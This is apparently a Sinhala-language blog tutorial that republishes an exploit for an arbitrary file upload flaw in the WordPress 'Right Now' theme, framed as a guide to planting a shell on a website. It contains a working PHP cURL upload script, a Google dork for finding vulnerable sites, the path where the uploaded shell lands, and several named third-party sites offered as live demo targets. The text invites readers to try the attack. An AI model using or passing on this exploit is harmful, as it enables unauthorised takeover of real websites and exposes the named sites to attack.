WordPress Right Now theme – Arbitrary File Upload Vulnerability

ඔන්න මේක පොඩි ටියුට් එකක්. Website එකකට shell එකක් දාගන්න විදිහ තමයි දාන්න යන්නෙ. සමහරු නම් දන්නවා ඇති. මේක නොදන්න අයට. කරලා බැලුවට කමක් නෑ, හැබැයි Elite_x, Cryp70n, www.synkoda.com කියන නම් 3 ගාවන්න තහනම් ඈ.

මෙන්න වීඩියෝ එක.

###############################################################

# Exploit Title: WordPress Right Now theme – Arbitrary File Upload Vulnerability

# Author: Cryp70n

# Date: 10/31/2013

# Category: webapps/php

# Google dork: inurl:wp-content/themes/RightNow/

###############################################################

= = = = = = = =

1)Exploit =

2)Real Demo = http://monroemartincomedy.com//wp-conten…index.html

= = = = = = = =

1)Exploit :

= = = = = = 

<?php

$uploadfile=”YourFile.php”;

$ch = curl_init(“http://[Target]/rightnowwp/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php”);

curl_setopt($ch, CURLOPT_POST, true);

curl_setopt($ch, CURLOPT_POSTFIELDS,

array(‘Filedata’=>”@$uploadfile”));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);

curl_close($ch);

print “$postResult”;

?>

2) Exploit demo :

= = = = = = = = =

http://brainframe.it/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php

http://swedishhousemafia.it/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php

http://www.iteva.co/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php

# #### #### #### #### #### #### #### #### #

Shell Path : http://[Target]/wp-content/uploads/settingsimages/YourFile.php

# #### #### #### #### #### #### #### #### #

එහෙනම් හොද නරක කියාගෙන, කමෙන්ට් එකකුත් දාගෙනම යන්න ඈ. Channel එකට Subscribe කරන්නත් අමතක කරන්න එපා.


Leave a Comment